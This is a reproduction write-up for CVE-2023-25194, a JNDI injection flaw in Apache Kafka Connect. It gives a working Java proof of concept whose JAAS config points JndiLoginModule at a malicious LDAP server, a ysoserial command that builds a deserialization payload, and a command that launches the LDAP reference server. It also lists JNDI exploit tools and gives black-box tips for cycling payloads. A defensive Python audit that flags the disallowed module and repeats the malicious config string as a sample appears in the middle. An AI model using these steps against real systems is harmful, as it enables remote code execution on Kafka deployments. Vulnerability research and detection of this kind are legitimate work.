Apache Kafka Connect JNDI injection vulnerability reproduction (CVE-2023-25194)
Vulnerability description
- Affected versions: 2.3.0 <= Apache Kafka Connect <= 3.3.2
- Remediation: upgrade to version 3.4.0
- Official link: https://kafka.apache.org/cve-list
Vulnerability reproduction
First start a Kafka server locally:
wget https://dlcdn.apache.org/kafka/3.4.0/kafka_2.13-3.4.0.tgz
tar -xvf kafka_2.13-3.4.0.tgz
# start ZooKeeper and Kafka
bin/zookeeper-server-start.sh config/zookeeper.properties
bin/kafka-server-start.sh config/server.properties
# create a test topic
bin/kafka-topics.sh --create --bootstrap-server localhost:9092 --replication-factor 1 --partitions 1 --topic test
Test code
import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.Producer;
import org.apache.kafka.clients.producer.ProducerRecord;
import java.util.Properties;

public class Main {
    public static void main(String[] args) {
        Properties props = new Properties();
        props.put("sasl.mechanism", "SCRAM-SHA-256");
        props.put("security.protocol", "SASL_SSL");
        // The JAAS config is the trigger: when the client logs in, JndiLoginModule
        // performs a JNDI lookup against the LDAP server named in user.provider.url.
        props.put("sasl.jaas.config", "com.sun.security.auth.module.JndiLoginModule "
                + "required user.provider.url=\"ldap://0.0.0.0:1389/Exploit\" "
                + "useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" "
                + "group.provider.url=\"xxx\";");
        props.put("bootstrap.servers", "0.0.0.0:9092");
        // Deserializer settings are unused by a producer; only the serializers matter.
        props.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
        props.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
        props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
        props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
        new Thread(() -> {
            Producer<String, String> producer = new KafkaProducer<>(props);
            producer.send(new ProducerRecord<>("test", "hello", "world"));
            producer.close();
        }).start();
    }
}
pom.xml:
<dependencies>
    <dependency>
        <groupId>org.apache.kafka</groupId>
        <artifactId>kafka-clients</artifactId>
        <version>3.3.0</version>
    </dependency>
    <dependency>
        <groupId>commons-beanutils</groupId>
        <artifactId>commons-beanutils</artifactId>
        <version>1.8.3</version>
    </dependency>
</dependencies>
Generating the deserialization payload
java -jar ysuserial-1.3-su18-all.jar -g CommonsBeanutils1183NOCC -p 'open -a Calculator.app' |base64|pbcopy
Hosting the data on LDAP
Edit the malicious LDAP server so that it serves the data generated in the previous step, then start it:
java -cp HackerRMIRefServer-all.jar HackerLDAPRefServer 0.0.0.0 8088 1389
Run the code and the calculator pops up.
Problems encountered during testing
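A defender-side check, added here as an example and not part of the original write-up or of Kafka's own code: an audit that parses the JAAS strings found in client or Kafka Connect connector configs (the plain sasl.jaas.config key used by the test code above, and prefixed forms such as producer.override.sasl.jaas.config that Connect accepts as connector client overrides) and flags the JndiLoginModule entry the PoC relies on, plus any other entry whose option points at a JNDI provider URL. Apache Kafka 3.4.0 enforces the same policy inside the broker and worker through the org.apache.kafka.disallowed.login.modules system property, which disallows com.sun.security.auth.module.JndiLoginModule by default; the denylist below mirrors that default. The two connector configs are constructed samples, and the FileStreamSinkConnector class name is used only as a plausible connector.class value.

```python
import re
from typing import Dict, List, Tuple

# Login modules to refuse in any sasl.jaas.config. Mirrors the default of
# Kafka 3.4.0's org.apache.kafka.disallowed.login.modules property (example code).
DISALLOWED_LOGIN_MODULES = {"com.sun.security.auth.module.JndiLoginModule"}

# Control flags permitted by the JAAS grammar:  <module> <flag> [key=value ...];
CONTROL_FLAGS = {"required", "requisite", "sufficient", "optional"}

# URL schemes that hand a JNDI lookup to a remote naming service.
JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://", "iiop://")

# A token is a run of non-blank, non-';' characters in which double- or
# single-quoted segments may contain blanks, or a bare ';' ending one entry.
_TOKEN = re.compile(r'(?:[^\s;"\']|"[^"]*"|\'[^\']*\')+|;')

JaasEntry = Tuple[str, str, Dict[str, str]]


def _unquote(value: str) -> str:
    """Strip one pair of matching surrounding quotes, if present."""
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
        return value[1:-1]
    return value


def _build_entry(tokens: List[str]) -> JaasEntry:
    """Turn the tokens of one entry into (module, flag, options)."""
    if len(tokens) < 2 or tokens[1] not in CONTROL_FLAGS:
        raise ValueError("malformed JAAS entry: " + " ".join(tokens))
    options: Dict[str, str] = {}
    for opt in tokens[2:]:
        key, sep, val = opt.partition("=")
        if not sep:
            raise ValueError("JAAS option without '=': " + opt)
        options[key] = _unquote(val)
    return tokens[0], tokens[1], options


def parse_jaas_config(value: str) -> List[JaasEntry]:
    """Parse a JAAS config string into its login-module entries."""
    entries: List[JaasEntry] = []
    current: List[str] = []
    for tok in _TOKEN.findall(value):
        if tok == ";":
            if current:
                entries.append(_build_entry(current))
                current = []
        else:
            current.append(tok)
    if current:  # tolerate a missing trailing ';'
        entries.append(_build_entry(current))
    return entries


def jaas_config_keys(config: Dict[str, str]) -> List[str]:
    """Keys that carry a JAAS string: the plain key and prefixed forms such as
    producer.override.sasl.jaas.config or listener.name.<x>.<y>.sasl.jaas.config."""
    return [k for k in config
            if k == "sasl.jaas.config" or k.endswith(".sasl.jaas.config")]


def audit_config(config: Dict[str, str]) -> List[Dict[str, object]]:
    """One finding per JAAS entry that names a disallowed login module or
    points any option value at a JNDI provider URL."""
    findings: List[Dict[str, object]] = []
    for key in jaas_config_keys(config):
        for module, _flag, options in parse_jaas_config(config[key]):
            urls = {k: v for k, v in options.items()
                    if v.lower().startswith(JNDI_SCHEMES)}
            if module in DISALLOWED_LOGIN_MODULES:
                reason = "disallowed-login-module"
            elif urls:
                reason = "jndi-url-option"
            else:
                continue
            findings.append({"key": key, "module": module,
                             "reason": reason, "urls": urls})
    return findings


# Constructed sample: a connector config as submitted to the Connect REST API,
# carrying the PoC's JAAS string as a producer override.
MALICIOUS_CONNECTOR_CONFIG = {
    "connector.class": "org.apache.kafka.connect.file.FileStreamSinkConnector",
    "producer.override.security.protocol": "SASL_SSL",
    "producer.override.sasl.mechanism": "SCRAM-SHA-256",
    "producer.override.sasl.jaas.config":
        'com.sun.security.auth.module.JndiLoginModule required '
        'user.provider.url="ldap://0.0.0.0:1389/Exploit" useFirstPass="true" '
        'serviceName="x" debug="true" group.provider.url="xxx";',
}

# Constructed sample: the same override using a legitimate SCRAM login module.
BENIGN_CONNECTOR_CONFIG = {
    "connector.class": "org.apache.kafka.connect.file.FileStreamSinkConnector",
    "producer.override.sasl.jaas.config":
        'org.apache.kafka.common.security.scram.ScramLoginModule required '
        'username="connect" password="placeholder-password";',
}

if __name__ == "__main__":
    for name, cfg in (("malicious", MALICIOUS_CONNECTOR_CONFIG),
                      ("benign", BENIGN_CONNECTOR_CONFIG)):
        print(name, audit_config(cfg))
```

The same audit can be run over a dump of connector configs taken from the Connect REST API or over a worker's properties file before it is deployed; the URL heuristic is there because a denylist only catches modules that are already known to be dangerous.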
In the deserialization tests I tried the following JNDI frameworks; only the second one could execute the command, and even that was not perfect. In the end, generating the payload with su18's su18/ysoserial and then hosting it over LDAP proved reliable.
- https://github.com/Bl0omZ/JNDIEXP
- https://github.com/nu1r/JNDIExploit
- https://github.com/wyzxxz/jndi_tool
Considering a black-box scenario: if a URLDNS probe shows that a CB (CommonsBeanutils) chain is present, you can have ysoserial generate several different payloads and try them in turn during the attack.